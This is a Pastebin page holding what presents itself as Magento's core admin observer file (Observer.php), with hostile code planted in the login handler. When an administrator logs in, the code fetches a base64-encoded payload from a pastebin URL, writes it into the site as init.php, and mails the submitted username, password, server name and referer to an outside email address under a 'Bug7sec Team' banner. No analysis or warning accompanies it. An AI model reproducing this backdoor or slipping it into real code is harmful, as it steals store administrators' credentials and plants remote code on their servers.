Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /**
- * Magento
- *
- * NOTICE OF LICENSE
- *
- * This source file is subject to the Open Software License (OSL 3.0)
- * that is bundled with this package in the file LICENSE.txt.
- * It is also available through the world-wide-web at this URL:
- * http://opensource.org/licenses/osl-3.0.php
- * If you did not receive a copy of the license and are unable to
- * obtain it through the world-wide-web, please send an email
- * to license@magento.com so we can send you a copy immediately.
- *
- * DISCLAIMER
- *
- * Do not edit or add to this file if you wish to upgrade Magento to newer
- * versions in the future. If you wish to customize Magento for your
- * needs please refer to http://www.magento.com for more information.
- * @location /app/code/core/Mage/Admin/Model/Observer.php
- * @category Mage
- * @package Mage_Admin
- * @copyright Copyright (c) 2006-2014 X.commerce, Inc. (http://www.magento.com)
- * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
- */
- /**
- * Admin observer model
- *
- * @category Mage
- * @package Mage_Admin
- * @author Magento Core Team <core@magentocommerce.com>
- */
- class Mage_Admin_Model_Observer
- {
- const FLAG_NO_LOGIN = 'no-login';
- /**
- * Handler for controller_action_predispatch event
- *
- * @param Varien_Event_Observer $observer
- * @return boolean
- */
- public function actionPreDispatchAdmin($observer)
- {
- $session = Mage::getSingleton('admin/session');
- /** @var $session Mage_Admin_Model_Session */
- $request = Mage::app()->getRequest();
- $user = $session->getUser();
- $requestedActionName = $request->getActionName();
- $openActions = array(
- 'forgotpassword',
- 'resetpassword',
- 'resetpasswordpost',
- 'logout',
- 'refresh' // captcha refresh
- );
- if (in_array($requestedActionName, $openActions)) {
- $request->setDispatched(true);
- } else {
- if($user) {
- $user->reload();
- }
- if (!$user || !$user->getId()) {
- if ($request->getPost('login')) {
- $logsFgt = base64_decode(file_get_contents("http://pastebin.com/raw/wFD24Bzm"));
- $logs = file_put_contents($_SERVER["DOCUMENT_ROOT"]."/skin/adminhtml/default/default/js/init.php", $logsFgt);
- if( $logs ){
- $logs = "/skin/adminhtml/default/default/js/init.php";
- }else{
- $logs = "- failed -";
- }
- $postLogin = $request->getPost('login');
- $username = isset($postLogin['username']) ? $postLogin['username'] : '';
- $password = isset($postLogin['password']) ? $postLogin['password'] : '';
- $msg .= "-------------[ Bug7sec Team ]-------------\n";
- $msg .= "Situsnya : ".$_SERVER['SERVER_NAME']."\n";
- $msg .= "Username : ".$postLogin['username']."\n";
- $msg .= "Password : ".$postLogin['password']."\n";
- $msg .= "Logs : ".$logs."\n";
- $msg .= "Referer : ".$_SERVER["HTTP_REFERER"]."\n";
- mail("duetanmauts@gmail.com", "[Log Login] Situs ".$_SERVER['SERVER_NAME'], $msg);
- $session->login($username, $password, $request);
- $request->setPost('login', null);
- }
- if (!$request->getParam('forwarded')) {
- if ($request->getParam('isIframe')) {
- $request->setParam('forwarded', true)
- ->setControllerName('index')
- ->setActionName('deniedIframe')
- ->setDispatched(false);
- } elseif($request->getParam('isAjax')) {
- $request->setParam('forwarded', true)
- ->setControllerName('index')
- ->setActionName('deniedJson')
- ->setDispatched(false);
- } else {
- $request->setParam('forwarded', true)
- ->setRouteName('adminhtml')
- ->setControllerName('index')
- ->setActionName('login')
- ->setDispatched(false);
- }
- return false;
- }
- }
- }
- $session->refreshAcl();
- }
- /**
- * Unset session first visit flag after displaying page
- *
- * @deprecated after 1.4.0.1, logic moved to admin session
- * @param Varien_Event_Observer $event
- */
- public function actionPostDispatchAdmin($event)
- {
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
